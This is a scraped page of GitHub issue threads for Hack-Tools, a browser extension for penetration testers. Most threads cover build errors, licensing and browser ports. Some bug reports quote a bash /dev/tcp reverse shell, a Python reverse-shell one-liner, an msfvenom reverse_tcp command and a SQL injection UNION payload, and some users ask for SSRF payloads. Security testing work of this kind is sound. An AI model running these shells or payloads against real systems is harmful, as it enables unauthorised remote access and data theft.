lascc / hack-tools Goto Github PK
View Code? Open in Web Editor NEWThe all-in-one browser extension for offensive security professionals 🛠
Home Page: https://hacktools.sh
The all-in-one browser extension for offensive security professionals 🛠
Home Page: https://hacktools.sh
As someone who is familiar with windows power shell, it came to a surprise that a Firefox extension would have wrong/outdated tools on its extension. Please fix this soon.
I think it must be Ruby spawn shell
because Python spawn shell
has already there.
Hi @LasCC , thanks for the good work. I ported the extension to safari. It works perfectly in full screen mode. The only issue is that there is a lag when using the popup mode. Aside that it's pretty cool. Thanks.
xcrun safari-web-extension-coverter [path_to_dist_folder]
Follow the instructions to create the project. Default language should be Swift.
3. Build project.
4. Open Safari and enable unsigned extensions; Develop -> Allow Unsigned Extensions.
5. Open Safari -> Preferences -> Extensions and enable Hack-Tools
6. Click on the extension icon and switch to full screen mode.
Hi! First congratulations on the plugin. It's my favorite. Second, I wanted to report that the encode of a bash reverse shell is not working correctly. Encode always never works. See the result of what I copied:
bash%20-c%20'exec%20bash%20-i%20&%3E/dev/tcp/10.4.12.124/1234%20%3C&1'
Now look at the difference between another well known tool. I believe that some bars need to be replaced for it to work correctly.
bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F10.4.12.124%2F1234%20%3C%261%27
By: https://www.urlencoder.org/
Thanks.
Not sure why, but yarn will not build this. Keeps giving me an error of no such directory
$ uname -a
Darwin 51pwns-MacBook-Pro.local 21.4.0 Darwin Kernel Version 21.4.0: Mon Feb 21 20:34:37 PST 2022; root:xnu-8020.101.4~2/RELEASE_X86_64 x86_64
$ npm -v
8.5.5
$ node -v
v17.8.0
npm install
64 timing idealTree Completed in 19938ms
165 timing command:install Completed in 19950ms
166 verbose stack Error: could not resolve
166 verbose stack at PlaceDep.failPeerConflict (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:546:25)
166 verbose stack at PlaceDep.place (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:197:21)
166 verbose stack at new PlaceDep (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:71:10)
166 verbose stack at /usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:964:31
166 verbose stack at Array.map (<anonymous>)
166 verbose stack at Arborist.[buildDepStep] (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:964:8)
166 verbose stack at async Arborist.buildIdealTree (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:216:7)
166 verbose stack at async Promise.all (index 1)
166 verbose stack at async Arborist.reify (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/reify.js:153:5)
166 verbose stack at async Install.exec (/usr/local/lib/node_modules/npm/lib/commands/install.js:159:5)
167 verbose cwd /Users/51pwn/MyWork/Hack-Tools
168 verbose Darwin 21.4.0
169 verbose argv "/usr/local/Cellar/node/17.8.0/bin/node" "/usr/local/bin/npm" "install"
170 verbose node v17.8.0
171 verbose npm v8.5.5
172 error code ERESOLVE
npm ERR! code ERESOLVE
npm ERR! ERESOLVE could not resolve
npm ERR!
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/react
npm ERR! react@"latest" from the root project
npm ERR! peer react@">=16.0.0" from @ant-design/[email protected]
npm ERR! node_modules/@ant-design/icons
npm ERR! @ant-design/icons@"4.7.0" from the root project
npm ERR! 1 more (react-dom)
npm ERR!
npm ERR! Could not resolve dependency:
npm ERR! @hot-loader/react-dom@"^17.0.1" from the root project
npm ERR!
npm ERR! Conflicting peer dependency: [email protected]
npm ERR! node_modules/react
npm ERR! peer react@"17.0.2" from @hot-loader/[email protected]
npm ERR! node_modules/@hot-loader/react-dom
npm ERR! @hot-loader/react-dom@"^17.0.1" from the root project
npm ERR!
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force, or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.
It looks like your amazing extension got removed from the Firefox Add-on site, did they tell you why?
https://addons.mozilla.org/en-US/firefox/addon/hacktools/
Is it possible to provide a compiled xpi so we can manually install in Firefox?
Add some SSRF payload to enumerate ec2 instances?
Hey!
I'm developing a bunch of hash APIs, the most recent one is: https://github.com/HashPals/Name-That-Hash
It has a web API for the website ( https://nth.skerritt.blog ), if you wanted I could make a "pretty" URL for the API for you to use? It takes about a second to get the results :)
Also talk to me on Discord if you're interested, I have my GitHub notifs off :) https://discord.gg/CGSDqEA
Hello again, I saw that you fixed the URL encode issue. I believe an interesting addition would be to put a Reverse Shell in NodeJS. See some examples at the link below:
https://medium.com/dont-code-me-on-that/bunch-of-shells-nodejs-cdd6eb740f73
Thanks.
I cannot find the option to put Hack-Tools into Dark mode, my browser is set to Dark Mode already.
Would it be possible to get Font Scaling? SHould I open a separate issue for that?
Dear DEVs,
thank you for this great and useful extension!
The version on addons.mozilla.org is still at 0.4..0, while 0.5.0 is available as release here.
Am I missing something? :)
_Originally posted by @newshourindia in git clone https://github.com/LasCC/Hack-Tools.git
cd Hack-Tools
npm install && npm run build # If you have installed yarn you can replace npm with yarn
i have copied the bash url encoded and put it in my kali linux therminal but it says "zsh: no such file or directory: bash%20-c%20exec%20bash%20-i%20&%3E/dev/tcp//%20%3C&1
"
it's a very interesting project!
Would you consider adding a license to this repository to specify under which terms this code can be used?
I did not get CVE Search engine on your tool. If I click the CVE icon It says that report that bug.
$ npm install && npm run build
npm ERR! code ERESOLVE
npm ERR! ERESOLVE unable to resolve dependency tree
npm ERR!
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/react
npm ERR! react@"^18.2.0" from the root project
npm ERR!
npm ERR! Could not resolve dependency:
npm ERR! peer react@"17.0.2" from @hot-loader/[email protected]
npm ERR! node_modules/@hot-loader/react-dom
npm ERR! @hot-loader/react-dom@"^17.0.2" from the root project
npm ERR!
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.
I have work with this extension for a while and I recently noticed the presence of a 'dev' branch, which appears to be much more interesting than master branch.
So do we have any release of the dev branch ? When will we see this new version ?
' UNION SELECT column_name,NULL FROM where table_name="X" -- -
should be ' UNION SELECT column_name,NULL FROM all_tab_columns where table_name="X" -- -
This is horrible and wrong this goes against school rules
TODO :
Replace python reverse shell by
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
What's the license for code in this repo?
Hello,
I would like to report a bug in the MSF Venom Builder. When copying the generated payload to the clipboard, commas appear between each value, which can cause issues when trying to use the payload in other tools or scripts.
Steps to reproduce:
Expected result:
The generated payload should be copied to the clipboard without any extra characters or formatting.
Actual result:
Commas appear between each value of the generated payload when it is copied to the clipboard.
This bug can be frustrating and time-consuming to work around, and I would appreciate it if the developers could investigate and fix the issue as soon as possible.
Thank you for your attention to this matter.
Hi,
It seems the copy icon at syntax of MSF Venom Command is not correct
When I paste in Terminal Console or Notepad, it always insert comma between each selection
msfvenom -p ,linux/x64/shell/reverse_tcp, LHOST=10.10.16.15, LPORT=4444, --platform linux, -a x64,false,false,false,false, -f elf, -o reverse-x64.exe
→ If I remove all the comma, it works
Regards!
First of all, this tool looks really nice, good job there!
I think it would be good to have an Useful Windows commands
(similar to the Linux one)
My .2 😄
wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn"
Cool
At the moment, loading Hack-Tools in my Chromium based browser throws an error with the version number defined in the manifest.json
file, specifically because the version is 0.1.2b
. This is what the file looks like at the moment (as of this release):
{
"name": "Hack Tools",
"version": "0.1.2b",
"description": "The all in one Red team extension for web pentester",
"browser_action": {
"default_title": "Hack Tools",
"default_popup": "index.html",
"default_icon": {
"16": "get_started16.png",
"32": "get_started32.png",
"48": "get_started48.png",
"128": "get_started128.png"
}
},
"icons": {
"16": "get_started16.png",
"32": "get_started32.png",
"48": "get_started48.png",
"128": "get_started128.png"
},
"manifest_version": 2,
"devtools_page": "devtools.html"
}
Switching 0.1.2b
to 0.1.2
manually seemed to fix the issue for me, and it'd be great if this change could be incorporated in the next release too.
Un fichier infecté a tenté de s'exécuter sur votre appareil.
Nom de la menace: Heur.BZC.PZQ.Boxter.6009.024F0EB9
Chemin : /Users/rafaelmoreno/Anytime/Hack-Tools/src/components/linux/ReverseShell.tsx
Nous avons effacé ce fichier en quarantaine pour éviter que des commandes malveillantes soient exécutées sur votre appareil.
ERROR in ./src/components/LayoutApp.js
Module not found: Error: Can't resolve './file_transfer/File_transfer' in '/home/madscientist/Documents/CTFTools/chrome-extensions/Hack-Tools/src/components'
@ ./src/components/LayoutApp.js 19:0-57 104:20-32
@ ./src/App.js
ERROR in ./src/components/FeedRSS.js
Module not found: Error: Can't resolve './rss/Cve' in '/home/madscientist/Documents/CTFTools/chrome-extensions/Hack-Tools/src/components'
@ ./src/components/FeedRSS.js 8:0-28 103:24-27 116:26-29
@ ./src/components/LayoutApp.js
@ ./src/App.js
./src/components/LayoutApp.js:19: import FileTransfer from "./file_transfer/File_transfer";
=> should be "./file_transfer/file_transfer"
./src/components/FeedRSS.js:8: import cve from './rss/Cve';
=> should be "./rss/cve"
npm install && npm run build
I got same issue as @UchihaSR : #28 (comment)
Then I following the error message and change this to what the error told :
File_transfer
to file_transfer
in https://github.com/LasCC/Hack-Tools/blob/6d3c623b16ffd715a36a8db4ac00f3b292b7a5c7/src/components/LayoutApp.js#L21 so it would become import FileTransfer from './file_transfer/file_transfer'
'Cve
to cve
in https://github.com/LasCC/Hack-Tools/blob/6d3c623b16ffd715a36a8db4ac00f3b292b7a5c7/src/components/FeedRSS.js#L8 import cve from './rss/cve'
And rerun yarn build
result successfull build dist
I don't know why it happen just File_transfer
& Cve
. The fact that all inside folder components
works fine.
Hi there,
This might be known -but not finding references to it. Windows defender is reporting the extension as containing malware, notably Win32/Uwamson.A!ml
I suspect it's due to the content of the extension and that the AV heuristics are reporting on that, more than actual malware.
Just thought I'd let you know if you've not heard about it.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.